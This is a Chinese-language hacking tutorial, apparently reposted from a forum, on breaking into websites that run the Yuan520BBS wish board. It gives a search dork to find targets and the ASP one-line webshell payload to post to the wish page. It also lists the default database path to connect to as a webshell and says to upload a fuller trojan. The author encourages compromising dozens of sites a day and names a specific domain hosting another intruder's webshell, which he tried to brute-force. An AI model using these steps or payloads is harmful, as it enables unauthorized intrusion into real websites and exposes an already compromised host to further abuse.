一句话入侵Yuan520BBS许愿版思路总结

　　大家好，今天把自己入侵Yuan520BBS许愿版的过程总结一下。思路其实也很简单，就是利用了Yuan520BBS许愿版的默认数据库，写入一句话进行连接。

　　1 第一步当然是搜索了。关键词选“Powered By Yuan520BBS”，会出来一大堆“『购物商城』论坛 - Powered By Yuan520BBS”的网站，随便挑一个，假设为http://xxx.yyy。

　　2 去许愿版写一句话马，许愿版的网页一般是 http://xxx.yyy/bbs/wish1/wish.asp，强调一下一句话马是<%execute request("value")%>，里面的value不要改。我以前总不成功，就是因为改value了。

　　3 用一句话客户端连接数据库。许愿版的默认数据库地址是http://xxx.yyy/bbs/database/#wish.asp，你可以打开这个连接看看，如果是一堆乱码，那就没错。如果不是，去暴库吧。我图省事，没去暴库，再说暴库成功率也不高，默认的数据库足够用了。

　　4 最后一步，传马，呵呵，就不用我说了吧。看到可爱的小马出现，心里真是激动啊。相信，再菜的鸟看完教程也知道怎么做了。

　　这个漏洞看起来很简单，但后果确是很严重的，因为比较容易*作。默认数据库漏洞很具有普遍性，举一反三我们能入侵大量站点。如果再结合挖掘鸡、网站猎手，一天拿下几十个网站不成问题，思路的确很重要，大家不要蛮干阿。

　　有趣的是，有个叫小白的朋友在我前面攻入网站，而且堵上后门，但被我把网马挖出来了，http://dh123.com/database/help.asp ,希望小白兄别见怪阿，因为help.asp明显就是一句话马传上去的嘛，呵呵。出于好玩用accessdriver试了试爆破，但没成功，这个网马只有一个密码框，还是很适合爆破的，就是我的字典差点。

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有